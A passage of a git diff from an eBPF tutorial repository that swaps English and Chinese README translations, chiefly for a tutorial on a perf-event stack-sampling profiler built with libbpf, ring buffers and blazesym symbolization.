程序收到的事件。根据事件类型(进程执行或退出),它会提取并打印事件信息,如时间戳、进程名、进程 ID、父进程 ID、文件名或退出代码等。 -Finally, we use the ring_buffer__poll() function to poll the ring buffer and process the received event data: +最后,我们使用 ring_buffer__poll() 函数轮询环形缓冲区,处理收到的事件数据: ```c while (!exiting) { @@ -567,7 +569,7 @@ while (!exiting) { } ``` -When the program receives the SIGINT or SIGTERM signal, it completes the final cleanup and exit operations, and closes and unloads the eBPF program: +当程序收到 SIGINT 或 SIGTERM 信号时,它会最后完成清理、退出操作,关闭和卸载 eBPF 程序: ```c cleanup: @@ -579,25 +581,25 @@ cleanup: } ``` -## Dependency Installation +## 安装依赖 -Building the example requires clang, libelf, and zlib. The package names may vary in different distributions. +构建示例需要 clang、libelf 和 zlib。包名在不同的发行版中可能会有所不同。 -On Ubuntu/Debian, you need to execute the following command: +在 Ubuntu/Debian 上,你需要执行以下命令: ```shell sudo apt install clang libelf1 libelf-dev zlib1g-dev ``` -On CentOS/Fedora, you need to execute the following command: +在 CentOS/Fedora 上,你需要执行以下命令: ```shell sudo dnf install clang elfutils-libelf elfutils-libelf-devel zlib-devel ``` -## Compile and Run +## 编译运行 -Compile and run the above code: +编译运行上述代码: ```console $ git submodule update --init --recursive @@ -612,22 +614,15 @@ TIME EVENT COMM PID PPID FILENAME/EXIT CODE 03:16:41 EXEC sh 110688 80168 /bin/sh 03:16:41 EXEC which 110689 110688 /usr/bin/which 03:16:41 EXIT which 110689 110688 [0] (0ms) -03:16:41 EXIT sh 110688 80168 [0] (0ms)". 
+03:16:41 EXIT sh 110688 80168 [0] (0ms) +03:16:41 EXEC sh 110690 80168 /bin/sh +03:16:41 EXEC ps 110691 110690 /usr/bin/ps +03:16:41 EXIT ps 110691 110690 [0] (49ms) +03:16:41 EXIT sh 110690 80168 [0] (51ms) ``` -The complete source code can be found at +## 总结 -## Summary +通过这个实例,我们了解了如何将 eBPF 程序与用户态程序结合使用。这种结合为开发者提供了一个强大的工具集,可以实现跨内核和用户空间的高效数据收集和处理。通过使用 eBPF 和 libbpf,您可以构建更高效、可扩展和安全的监控和性能分析工具。 -Through this example, we have learned how to combine eBPF programs with user-space programs. This combination provides developers with a powerful toolkit for efficient data collection and processing across the kernel and user space. By using eBPF and libbpf, you can build more efficient, scalable, and secure monitoring and performance analysis tools. - -In the following tutorials, we will continue to explore the advanced features of eBPF and share more about eBPF development practices. Through continuous learning and practice, you will have a better understanding and mastery of eBPF technology and apply it to solve real-world problems. - -If you would like to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository at or website for more examples and complete tutorials. - -## Reference - -- [Building BPF applications with libbpf-bootstrap](https://nakryiko.com/posts/libbpf-bootstrap/) -- - -> The original link of this article: +如果您希望学习更多关于 eBPF 的知识和实践,可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/12-profile/README.md b/src/12-profile/README.md index d1f73f5..c6a825f 100644 --- a/src/12-profile/README.md +++ b/src/12-profile/README.md @@ -1,23 +1,23 @@ -# eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析 +# eBPF Tutorial by Example 12: Using eBPF Program Profile for Performance Analysis -本教程将指导您使用 libbpf 和 eBPF 程序进行性能分析。我们将利用内核中的 perf 机制,学习如何捕获函数的执行时间以及如何查看性能数据。 +This tutorial will guide you on using libbpf and eBPF programs for performance analysis. We will leverage the perf mechanism in the kernel to learn how to capture the execution time of functions and view performance data. -libbpf 是一个用于与 eBPF 交互的 C 库。它提供了创建、加载和使用 eBPF 程序所需的基本功能。本教程中,我们将主要使用 libbpf 完成开发工作。perf 是 Linux 内核中的性能分析工具,允许用户测量和分析内核及用户空间程序的性能,以及获取对应的调用堆栈。它利用内核中的硬件计数器和软件事件来收集性能数据。 +libbpf is a C library for interacting with eBPF. It provides the basic functionality for creating, loading, and using eBPF programs. In this tutorial, we will mainly use libbpf for development. Perf is a performance analysis tool in the Linux kernel that allows users to measure and analyze the performance of kernel and user space programs, as well as obtain corresponding call stacks. It collects performance data using hardware counters and software events in the kernel. -## eBPF 工具:profile 性能分析示例 +## eBPF Tool: profile Performance Analysis Example -`profile` 工具基于 eBPF 实现,利用 Linux 内核中的 perf 事件进行性能分析。`profile` 工具会定期对每个处理器进行采样,以便捕获内核函数和用户空间函数的执行。它可以显示栈回溯的以下信息: +The `profile` tool is implemented based on eBPF and utilizes the perf events in the Linux kernel for performance analysis. The `profile` tool periodically samples each processor to capture the execution of kernel and user space functions. 
It provides the following information for stack traces: -- 地址:函数调用的内存地址 -- 符号:函数名称 -- 文件名:源代码文件名称 -- 行号:源代码中的行号 +- Address: memory address of the function call +- Symbol: function name +- File Name: name of the source code file +- Line Number: line number in the source code -这些信息有助于开发人员定位性能瓶颈和优化代码。更进一步,可以通过这些对应的信息生成火焰图,以便更直观的查看性能数据。 +This information helps developers locate performance bottlenecks and optimize code. Furthermore, flame graphs can be generated based on this information for a more intuitive view of performance data. -在本示例中,可以通过 libbpf 库编译运行它(以 Ubuntu/Debian 为例): +In this example, you can compile and run it with the libbpf library (using Ubuntu/Debian as an example): -**NOTE:** 首先需要安装 `cargo` 才能编译得到 `profile`, 安装方法可以参考[Cargo 手册](https://rustwiki.org/en/cargo/getting-started/installation.html) +**NOTE:** To compile the `profile`, you first need to install `Cargo`, as shown in ["The Cargo Book"](https://rustwiki.org/en/cargo/getting-started/installation.html) ```console $ git submodule update --init --recursive @@ -45,13 +45,13 @@ Userspace: 1 [<0000556dec34cad0>] ``` -## 实现原理 +## Implementation Principle -profile 工具由两个部分组成,内核态中的 eBPF 程序和用户态中的 `profile` 符号处理程序。`profile` 符号处理程序负责加载 eBPF 程序,以及处理 eBPF 程序输出的数据。 +The `profile` tool consists of two parts: the eBPF program in kernel space and the `profile` symbol handling program in user space. The `profile` symbol handling program is responsible for loading the eBPF program and processing the data outputted by the eBPF program. -### 内核态部分 +### Kernel Space Part -内核态 eBPF 程序的实现逻辑主要是借助 perf event,对程序的堆栈进行定时采样,从而捕获程序的执行流程。 +The implementation logic of the eBPF program in kernel space mainly relies on perf events to periodically sample the stack of the program, thereby capturing its execution flow. ```c // SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause @@ -98,88 +98,87 @@ int profile(void *ctx) } ``` -接下来,我们将重点讲解内核态代码的关键部分。 +Next, we will focus on the key part of the kernel code. -1. 定义 eBPF maps `events`: +1. Define eBPF maps `events`: - ```c +```c +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} events SEC(".maps"); +``` - struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); - } events SEC(".maps"); - ``` +Here, an eBPF map of type `BPF_MAP_TYPE_RINGBUF` is defined. The Ring Buffer is a high-performance circular buffer used to transfer data between the kernel and user space. `max_entries` sets the maximum size of the Ring Buffer. - 这里定义了一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 eBPF maps 。Ring Buffer 是一种高性能的循环缓冲区,用于在内核和用户空间之间传输数据。`max_entries` 设置了 Ring Buffer 的最大大小。 +2. Define `perf_event` eBPF program: -2. 定义 `perf_event` eBPF 程序: +```c +SEC("perf_event") +int profile(void *ctx) +``` - ```c - SEC("perf_event") - int profile(void *ctx) - ``` +Here, an eBPF program named `profile` is defined, which will be executed when a perf event is triggered. - 这里定义了一个名为 `profile` 的 eBPF 程序,它将在 perf 事件触发时执行。 +3. Get process ID and CPU ID: -3. 获取进程 ID 和 CPU ID: +```c +int pid = bpf_get_current_pid_tgid() >> 32; +int cpu_id = bpf_get_smp_processor_id(); +``` - ```c - int pid = bpf_get_current_pid_tgid() >> 32; - int cpu_id = bpf_get_smp_processor_id(); - ``` +The function `bpf_get_current_pid_tgid()` returns the PID and TID of the current process. By right shifting 32 bits, we get the PID. The function `bpf_get_smp_processor_id()` returns the ID of the current CPU. - `bpf_get_current_pid_tgid()` 函数返回当前进程的 PID 和 TID,通过右移 32 位,我们得到 PID。`bpf_get_smp_processor_id()` 函数返回当前 CPU 的 ID。 +4. 
Reserve space in the Ring Buffer: -4. 预留 Ring Buffer 空间: +```c +event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); +if (!event) + return 1; +``` - ```c - event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); - if (!event) - return 1; - ``` +Use the `bpf_ringbuf_reserve()` function to reserve space in the Ring Buffer for storing the collected stack information. If the reservation fails, return an error. - 通过 `bpf_ringbuf_reserve()` 函数预留 Ring Buffer 空间,用于存储采集的栈信息。若预留失败,返回错误. +5. Get the current process name: -5. 获取当前进程名: +```c - ```c +if (bpf_get_current_comm(event->comm, sizeof(event->comm))) + event->comm[0] = 0; +``` - if (bpf_get_current_comm(event->comm, sizeof(event->comm))) - event->comm[0] = 0; - ``` +Use the `bpf_get_current_comm()` function to get the current process name and store it in `event->comm`. - 使用 `bpf_get_current_comm()` 函数获取当前进程名并将其存储到 `event->comm`。 +6. Get kernel stack information: -6. 获取内核栈信息: +```c - ```c +event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); +``` - event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); - ``` +Use the `bpf_get_stack()` function to get kernel stack information. Store the result in `event->kstack` and the size in `event->kstack_sz`. - 使用 `bpf_get_stack()` 函数获取内核栈信息。将结果存储在 `event->kstack`,并将其大小存储在 `event->kstack_sz`。 +7. Get user space stack information: -7. 获取用户空间栈信息: +```c +event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); +``` - ```c - event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); - ``` +Using the `bpf_get_stack()` function with the `BPF_F_USER_STACK` flag retrieves information about the user space stack. Store the result in `event->ustack` and its size in `event->ustack_sz`. - 同样使用 `bpf_get_stack()` 函数,但传递 `BPF_F_USER_STACK` 标志以获取用户空间栈信息。将结果存储在 `event->ustack`,并将其大小存储在 `event->ustack_sz`。 +8. Submit the event to the Ring Buffer: -8. 将事件提交到 Ring Buffer: - - ```c +```c bpf_ringbuf_submit(event, 0); - ``` +``` - 最后,使用 `bpf_ringbuf_submit()` 函数将事件提交到 Ring Buffer,以便用户空间程序可以读取和处理。 +Finally, use the `bpf_ringbuf_submit()` function to submit the event to the Ring Buffer for the user space program to read and process. - 这个内核态 eBPF 程序通过定期采样程序的内核栈和用户空间栈来捕获程序的执行流程。这些数据将存储在 Ring Buffer 中,以便用户态的 `profile` 程序能读取。 +This kernel mode eBPF program captures the program's execution flow by sampling the kernel stack and user space stack of the program periodically. These data are stored in the Ring Buffer for the user mode `profile` program to read. -### 用户态部分 +### User Mode Section -这段代码主要负责为每个在线 CPU 设置 perf event 并附加 eBPF 程序: +This code is mainly responsible for setting up perf events for each online CPU and attaching eBPF programs: ```c static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, @@ -218,9 +217,9 @@ int main(){ } ``` -`perf_event_open` 这个函数是一个对 perf_event_open 系统调用的封装。它接收一个 perf_event_attr 结构体指针,用于指定 perf event 的类型和属性。pid 参数用于指定要监控的进程 ID(-1 表示监控所有进程),cpu 参数用于指定要监控的 CPU。group_fd 参数用于将 perf event 分组,这里我们使用 -1,表示不需要分组。flags 参数用于设置一些标志,这里我们使用 PERF_FLAG_FD_CLOEXEC 以确保在执行 exec 系列系统调用时关闭文件描述符。 +The `perf_event_open` function is a wrapper for the perf_event_open system call. It takes a pointer to a perf_event_attr structure to specify the type and attributes of the perf event. The pid parameter is used to specify the process ID to monitor (-1 for monitoring all processes), and the cpu parameter is used to specify the CPU to monitor. 
The group_fd parameter is used to group perf events, and we use -1 here to indicate no grouping is needed. The flags parameter is used to set some flags, and we use PERF_FLAG_FD_CLOEXEC to ensure file descriptors are closed when executing exec series system calls. -在 main 函数中: +In the main function: ```c for (cpu = 0; cpu < num_cpus; cpu++) { @@ -228,11 +227,9 @@ for (cpu = 0; cpu < num_cpus; cpu++) { } ``` -这个循环针对每个在线 CPU 设置 perf event 并附加 eBPF 程序。首先,它会检查当前 CPU 是否在线,如果不在线则跳过。然后,使用 perf_event_open() 函数为当前 CPU 设置 perf event,并将返回的文件描述符存储在 pefds 数组中。最后,使用 bpf_program__attach_perf_event() 函数将 eBPF 程序附加到 perf event。links 数组用于存储每个 CPU 上的 BPF 链接,以便在程序结束时销毁它们。 +This loop sets up perf events and attaches eBPF programs for each online CPU. Firstly, it checks if the current CPU is online and skips if it's not. Then, it uses the perf_event_open() function to set up perf events for the current CPU and stores the returned file descriptor in the pefds array. Finally, it attaches the eBPF program to the perf event using the bpf_program__attach_perf_event() function. The links array is used to store the BPF links for each CPU so that they can be destroyed when the program ends. By doing so, user-mode programs set perf events for each online CPU and attach eBPF programs to these perf events to monitor all online CPUs in the system. -通过这种方式,用户态程序为每个在线 CPU 设置 perf event,并将 eBPF 程序附加到这些 perf event 上,从而实现对系统中所有在线 CPU 的监控。 - -以下这两个函数分别用于显示栈回溯和处理从 ring buffer 接收到的事件: +The following two functions are used to display stack traces and handle events received from the ring buffer: ```c static void show_stack_trace(__u64 *stack, int stack_sz, pid_t pid) @@ -320,16 +317,18 @@ static int event_handler(void *_ctx, void *data, size_t size) } ``` -`show_stack_trace()` 函数用于显示内核或用户空间的栈回溯。它接收一个 stack 参数,是一个指向内核或用户空间栈的指针,stack_sz 参数表示栈的大小,pid 参数表示要显示的进程的 ID(当显示内核栈时,设置为 0)。函数中首先根据 pid 参数确定栈的来源(内核或用户空间),然后调用 blazesym_symbolize() 函数将栈中的地址解析为符号名和源代码位置。最后,遍历解析结果,输出符号名和源代码位置信息。 +The `show_stack_trace()` function is used to display the stack trace of the kernel or userspace. It takes a `stack` parameter, which is a pointer to the kernel or userspace stack, and a `stack_sz` parameter, which represents the size of the stack. The `pid` parameter represents the ID of the process to be displayed (set to 0 when displaying the kernel stack). In the function, the source of the stack (kernel or userspace) is determined based on the `pid` parameter, and then the `blazesym_symbolize()` function is called to resolve the addresses in the stack to symbol names and source code locations. Finally, the resolved results are traversed and the symbol names and source code location information are outputted. -`event_handler()` 函数用于处理从 ring buffer 接收到的事件。它接收一个 data 参数,指向 ring buffer 中的数据,size 参数表示数据的大小。函数首先将 data 指针转换为 stacktrace_event 结构体指针,然后检查内核和用户空间栈的大小。如果栈为空,则直接返回。接下来,函数输出进程名称、进程 ID 和 CPU ID 信息。然后分别显示内核栈和用户空间栈的回溯。调用 show_stack_trace() 函数时,分别传入内核栈和用户空间栈的地址、大小和进程 ID。 +The `event_handler()` function is used to handle events received from the ring buffer. It takes a `data` parameter, which points to the data in the ring buffer, and a `size` parameter, which represents the size of the data. The function first converts the `data` pointer to a pointer of type `stacktrace_event`, and then checks the sizes of the kernel and userspace stacks. If the stacks are empty, it returns directly. Next, the function outputs the process name, process ID, and CPU ID information. Then it displays the stack traces of the kernel and userspace respectively. 
When calling the `show_stack_trace()` function, the addresses, sizes, and process ID of the kernel and userspace stacks are passed in separately. -这两个函数作为 eBPF profile 工具的一部分,用于显示和处理 eBPF 程序收集到的栈回溯信息,帮助用户了解程序的运行情况和性能瓶颈。 +These two functions are part of the eBPF profiling tool, used to display and process stack trace information collected by eBPF programs, helping users understand program performance and bottlenecks. -### 总结 +### Summary -通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 程序进行性能分析。在这个过程中,我们详细讲解了如何创建 eBPF 程序,监控进程的性能,并从 ring buffer 中获取数据以分析栈回溯。我们还学习了如何使用 perf_event_open() 函数设置性能监控,并将 BPF 程序附加到性能事件上。在本教程中,我们还展示了如何编写 eBPF 程序来捕获进程的内核和用户空间栈信息,进而分析程序性能瓶颈。通过这个例子,您可以了解到 eBPF 在性能分析方面的强大功能。 +Through this introductory tutorial on eBPF, we have learned how to use eBPF programs for performance analysis. In this process, we explained in detail how to create eBPF programs, monitor process performance, and retrieve data from the ring buffer for analyzing stack traces. We also learned how to use the `perf_event_open()` function to set up performance monitoring and attach BPF programs to performance events. In this tutorial, we also demonstrated how to write eBPF programs to capture the kernel and userspace stack information of processes in order to analyze program performance bottlenecks. With this example, you can understand the powerful features of eBPF in performance analysis. -如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +If you want to learn more about eBPF knowledge and practices, please refer to the official documentation of eunomia-bpf: . You can also visit our tutorial code repository or website for more examples and complete tutorials. -接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。 +The next tutorial will further explore advanced features of eBPF. We will continue to share more content about eBPF development practices to help you better understand and master eBPF technology. We hope these contents will be helpful for your learning and practice on the eBPF development journey. 
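As a brief aside (not part of this patch): the flame graphs mentioned earlier in this tutorial are commonly produced with the classic perf + FlameGraph pipeline. A minimal sketch, assuming Brendan Gregg's FlameGraph repository is cloned into ./FlameGraph and that system-wide sampling for 30 seconds is acceptable:

```console
$ perf record -F 99 -a -g -- sleep 30        # sample all CPUs at 99 Hz for 30 s
$ perf script > out.perf                     # dump the collected samples as text
$ ./FlameGraph/stackcollapse-perf.pl out.perf > out.folded
$ ./FlameGraph/flamegraph.pl out.folded > flame.svg
```

The same idea applies to the `profile` tool's own output, though its stack format would first need to be folded into the `func1;func2;func3 count` form that flamegraph.pl expects.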
+ +> The original link of this article: diff --git a/src/12-profile/README.zh.md b/src/12-profile/README.zh.md new file mode 100644 index 0000000..d1f73f5 --- /dev/null +++ b/src/12-profile/README.zh.md @@ -0,0 +1,335 @@ +# eBPF 入门实践教程十二:使用 eBPF 程序 profile 进行性能分析 + +本教程将指导您使用 libbpf 和 eBPF 程序进行性能分析。我们将利用内核中的 perf 机制,学习如何捕获函数的执行时间以及如何查看性能数据。 + +libbpf 是一个用于与 eBPF 交互的 C 库。它提供了创建、加载和使用 eBPF 程序所需的基本功能。本教程中,我们将主要使用 libbpf 完成开发工作。perf 是 Linux 内核中的性能分析工具,允许用户测量和分析内核及用户空间程序的性能,以及获取对应的调用堆栈。它利用内核中的硬件计数器和软件事件来收集性能数据。 + +## eBPF 工具:profile 性能分析示例 + +`profile` 工具基于 eBPF 实现,利用 Linux 内核中的 perf 事件进行性能分析。`profile` 工具会定期对每个处理器进行采样,以便捕获内核函数和用户空间函数的执行。它可以显示栈回溯的以下信息: + +- 地址:函数调用的内存地址 +- 符号:函数名称 +- 文件名:源代码文件名称 +- 行号:源代码中的行号 + +这些信息有助于开发人员定位性能瓶颈和优化代码。更进一步,可以通过这些对应的信息生成火焰图,以便更直观的查看性能数据。 + +在本示例中,可以通过 libbpf 库编译运行它(以 Ubuntu/Debian 为例): + +**NOTE:** 首先需要安装 `cargo` 才能编译得到 `profile`, 安装方法可以参考[Cargo 手册](https://rustwiki.org/en/cargo/getting-started/installation.html) + +```console +$ git submodule update --init --recursive +$ sudo apt install clang libelf1 libelf-dev zlib1g-dev +$ make +$ sudo ./profile +COMM: chronyd (pid=156) @ CPU 1 +Kernel: + 0 [] _raw_spin_lock_irqsave+0x16 + 1 [] remove_wait_queue+0x14 + 2 [] poll_freewait+0x3d + 3 [] do_select+0x7bf + 4 [] core_sys_select+0x182 + 5 [] __x64_sys_pselect6+0xea + 6 [] do_syscall_64+0x38 + 7 [] entry_SYSCALL_64_after_hwframe+0x61 +Userspace: + 0 [<00007fab187bfe09>] + 1 [<000000000ee6ae98>] + +COMM: profile (pid=9843) @ CPU 6 +No Kernel Stack +Userspace: + 0 [<0000556deb068ac8>] + 1 [<0000556dec34cad0>] +``` + +## 实现原理 + +profile 工具由两个部分组成,内核态中的 eBPF 程序和用户态中的 `profile` 符号处理程序。`profile` 符号处理程序负责加载 eBPF 程序,以及处理 eBPF 程序输出的数据。 + +### 内核态部分 + +内核态 eBPF 程序的实现逻辑主要是借助 perf event,对程序的堆栈进行定时采样,从而捕获程序的执行流程。 + +```c +// SPDX-License-Identifier: GPL-2.0 OR BSD-3-Clause +/* Copyright (c) 2022 Meta Platforms, Inc. */ +#include "vmlinux.h" +#include +#include +#include + +#include "profile.h" + +char LICENSE[] SEC("license") = "Dual BSD/GPL"; + +struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); +} events SEC(".maps"); + +SEC("perf_event") +int profile(void *ctx) +{ + int pid = bpf_get_current_pid_tgid() >> 32; + int cpu_id = bpf_get_smp_processor_id(); + struct stacktrace_event *event; + int cp; + + event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); + if (!event) + return 1; + + event->pid = pid; + event->cpu_id = cpu_id; + + if (bpf_get_current_comm(event->comm, sizeof(event->comm))) + event->comm[0] = 0; + + event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); + + event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); + + bpf_ringbuf_submit(event, 0); + + return 0; +} +``` + +接下来,我们将重点讲解内核态代码的关键部分。 + +1. 定义 eBPF maps `events`: + + ```c + + struct { + __uint(type, BPF_MAP_TYPE_RINGBUF); + __uint(max_entries, 256 * 1024); + } events SEC(".maps"); + ``` + + 这里定义了一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 eBPF maps 。Ring Buffer 是一种高性能的循环缓冲区,用于在内核和用户空间之间传输数据。`max_entries` 设置了 Ring Buffer 的最大大小。 + +2. 定义 `perf_event` eBPF 程序: + + ```c + SEC("perf_event") + int profile(void *ctx) + ``` + + 这里定义了一个名为 `profile` 的 eBPF 程序,它将在 perf 事件触发时执行。 + +3. 获取进程 ID 和 CPU ID: + + ```c + int pid = bpf_get_current_pid_tgid() >> 32; + int cpu_id = bpf_get_smp_processor_id(); + ``` + + `bpf_get_current_pid_tgid()` 函数返回当前进程的 PID 和 TID,通过右移 32 位,我们得到 PID。`bpf_get_smp_processor_id()` 函数返回当前 CPU 的 ID。 + +4. 
预留 Ring Buffer 空间: + + ```c + event = bpf_ringbuf_reserve(&events, sizeof(*event), 0); + if (!event) + return 1; + ``` + + 通过 `bpf_ringbuf_reserve()` 函数预留 Ring Buffer 空间,用于存储采集的栈信息。若预留失败,返回错误. + +5. 获取当前进程名: + + ```c + + if (bpf_get_current_comm(event->comm, sizeof(event->comm))) + event->comm[0] = 0; + ``` + + 使用 `bpf_get_current_comm()` 函数获取当前进程名并将其存储到 `event->comm`。 + +6. 获取内核栈信息: + + ```c + + event->kstack_sz = bpf_get_stack(ctx, event->kstack, sizeof(event->kstack), 0); + ``` + + 使用 `bpf_get_stack()` 函数获取内核栈信息。将结果存储在 `event->kstack`,并将其大小存储在 `event->kstack_sz`。 + +7. 获取用户空间栈信息: + + ```c + event->ustack_sz = bpf_get_stack(ctx, event->ustack, sizeof(event->ustack), BPF_F_USER_STACK); + ``` + + 同样使用 `bpf_get_stack()` 函数,但传递 `BPF_F_USER_STACK` 标志以获取用户空间栈信息。将结果存储在 `event->ustack`,并将其大小存储在 `event->ustack_sz`。 + +8. 将事件提交到 Ring Buffer: + + ```c + bpf_ringbuf_submit(event, 0); + ``` + + 最后,使用 `bpf_ringbuf_submit()` 函数将事件提交到 Ring Buffer,以便用户空间程序可以读取和处理。 + + 这个内核态 eBPF 程序通过定期采样程序的内核栈和用户空间栈来捕获程序的执行流程。这些数据将存储在 Ring Buffer 中,以便用户态的 `profile` 程序能读取。 + +### 用户态部分 + +这段代码主要负责为每个在线 CPU 设置 perf event 并附加 eBPF 程序: + +```c +static long perf_event_open(struct perf_event_attr *hw_event, pid_t pid, + int cpu, int group_fd, unsigned long flags) +{ + int ret; + + ret = syscall(__NR_perf_event_open, hw_event, pid, cpu, group_fd, flags); + return ret; +} + +int main(){ + ... + for (cpu = 0; cpu < num_cpus; cpu++) { + /* skip offline/not present CPUs */ + if (cpu >= num_online_cpus || !online_mask[cpu]) + continue; + + /* Set up performance monitoring on a CPU/Core */ + pefd = perf_event_open(&attr, pid, cpu, -1, PERF_FLAG_FD_CLOEXEC); + if (pefd < 0) { + fprintf(stderr, "Fail to set up performance monitor on a CPU/Core\n"); + err = -1; + goto cleanup; + } + pefds[cpu] = pefd; + + /* Attach a BPF program on a CPU */ + links[cpu] = bpf_program__attach_perf_event(skel->progs.profile, pefd); + if (!links[cpu]) { + err = -1; + goto cleanup; + } + } + ... +} +``` + +`perf_event_open` 这个函数是一个对 perf_event_open 系统调用的封装。它接收一个 perf_event_attr 结构体指针,用于指定 perf event 的类型和属性。pid 参数用于指定要监控的进程 ID(-1 表示监控所有进程),cpu 参数用于指定要监控的 CPU。group_fd 参数用于将 perf event 分组,这里我们使用 -1,表示不需要分组。flags 参数用于设置一些标志,这里我们使用 PERF_FLAG_FD_CLOEXEC 以确保在执行 exec 系列系统调用时关闭文件描述符。 + +在 main 函数中: + +```c +for (cpu = 0; cpu < num_cpus; cpu++) { + // ... 
+} +``` + +这个循环针对每个在线 CPU 设置 perf event 并附加 eBPF 程序。首先,它会检查当前 CPU 是否在线,如果不在线则跳过。然后,使用 perf_event_open() 函数为当前 CPU 设置 perf event,并将返回的文件描述符存储在 pefds 数组中。最后,使用 bpf_program__attach_perf_event() 函数将 eBPF 程序附加到 perf event。links 数组用于存储每个 CPU 上的 BPF 链接,以便在程序结束时销毁它们。 + +通过这种方式,用户态程序为每个在线 CPU 设置 perf event,并将 eBPF 程序附加到这些 perf event 上,从而实现对系统中所有在线 CPU 的监控。 + +以下这两个函数分别用于显示栈回溯和处理从 ring buffer 接收到的事件: + +```c +static void show_stack_trace(__u64 *stack, int stack_sz, pid_t pid) +{ + const struct blazesym_result *result; + const struct blazesym_csym *sym; + sym_src_cfg src; + int i, j; + + if (pid) { + src.src_type = SRC_T_PROCESS; + src.params.process.pid = pid; + } else { + src.src_type = SRC_T_KERNEL; + src.params.kernel.kallsyms = NULL; + src.params.kernel.kernel_image = NULL; + } + + result = blazesym_symbolize(symbolizer, &src, 1, (const uint64_t *)stack, stack_sz); + + for (i = 0; i < stack_sz; i++) { + if (!result || result->size <= i || !result->entries[i].size) { + printf(" %d [<%016llx>]\n", i, stack[i]); + continue; + } + + if (result->entries[i].size == 1) { + sym = &result->entries[i].syms[0]; + if (sym->path && sym->path[0]) { + printf(" %d [<%016llx>] %s+0x%llx %s:%ld\n", + i, stack[i], sym->symbol, + stack[i] - sym->start_address, + sym->path, sym->line_no); + } else { + printf(" %d [<%016llx>] %s+0x%llx\n", + i, stack[i], sym->symbol, + stack[i] - sym->start_address); + } + continue; + } + + printf(" %d [<%016llx>]\n", i, stack[i]); + for (j = 0; j < result->entries[i].size; j++) { + sym = &result->entries[i].syms[j]; + if (sym->path && sym->path[0]) { + printf(" %s+0x%llx %s:%ld\n", + sym->symbol, stack[i] - sym->start_address, + sym->path, sym->line_no); + } else { + printf(" %s+0x%llx\n", sym->symbol, + stack[i] - sym->start_address); + } + } + } + + blazesym_result_free(result); +} + +/* Receive events from the ring buffer. 
*/ +static int event_handler(void *_ctx, void *data, size_t size) +{ + struct stacktrace_event *event = data; + + if (event->kstack_sz <= 0 && event->ustack_sz <= 0) + return 1; + + printf("COMM: %s (pid=%d) @ CPU %d\n", event->comm, event->pid, event->cpu_id); + + if (event->kstack_sz > 0) { + printf("Kernel:\n"); + show_stack_trace(event->kstack, event->kstack_sz / sizeof(__u64), 0); + } else { + printf("No Kernel Stack\n"); + } + + if (event->ustack_sz > 0) { + printf("Userspace:\n"); + show_stack_trace(event->ustack, event->ustack_sz / sizeof(__u64), event->pid); + } else { + printf("No Userspace Stack\n"); + } + + printf("\n"); + return 0; +} +``` + +`show_stack_trace()` 函数用于显示内核或用户空间的栈回溯。它接收一个 stack 参数,是一个指向内核或用户空间栈的指针,stack_sz 参数表示栈的大小,pid 参数表示要显示的进程的 ID(当显示内核栈时,设置为 0)。函数中首先根据 pid 参数确定栈的来源(内核或用户空间),然后调用 blazesym_symbolize() 函数将栈中的地址解析为符号名和源代码位置。最后,遍历解析结果,输出符号名和源代码位置信息。 + +`event_handler()` 函数用于处理从 ring buffer 接收到的事件。它接收一个 data 参数,指向 ring buffer 中的数据,size 参数表示数据的大小。函数首先将 data 指针转换为 stacktrace_event 结构体指针,然后检查内核和用户空间栈的大小。如果栈为空,则直接返回。接下来,函数输出进程名称、进程 ID 和 CPU ID 信息。然后分别显示内核栈和用户空间栈的回溯。调用 show_stack_trace() 函数时,分别传入内核栈和用户空间栈的地址、大小和进程 ID。 + +这两个函数作为 eBPF profile 工具的一部分,用于显示和处理 eBPF 程序收集到的栈回溯信息,帮助用户了解程序的运行情况和性能瓶颈。 + +### 总结 + +通过本篇 eBPF 入门实践教程,我们学习了如何使用 eBPF 程序进行性能分析。在这个过程中,我们详细讲解了如何创建 eBPF 程序,监控进程的性能,并从 ring buffer 中获取数据以分析栈回溯。我们还学习了如何使用 perf_event_open() 函数设置性能监控,并将 BPF 程序附加到性能事件上。在本教程中,我们还展示了如何编写 eBPF 程序来捕获进程的内核和用户空间栈信息,进而分析程序性能瓶颈。通过这个例子,您可以了解到 eBPF 在性能分析方面的强大功能。 + +如果您希望学习更多关于 eBPF 的知识和实践,请查阅 eunomia-bpf 的官方文档: 。您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 + +接下来的教程将进一步探讨 eBPF 的高级特性,我们会继续分享更多有关 eBPF 开发实践的内容,帮助您更好地理解和掌握 eBPF 技术,希望这些内容对您在 eBPF 开发道路上的学习和实践有所帮助。 diff --git a/src/12-profile/README_en.md b/src/12-profile/README_en.md deleted file mode 100644 index c6a825f..0000000 --- a/src/12-profile/README_en.md +++ /dev/null @@ -1,334 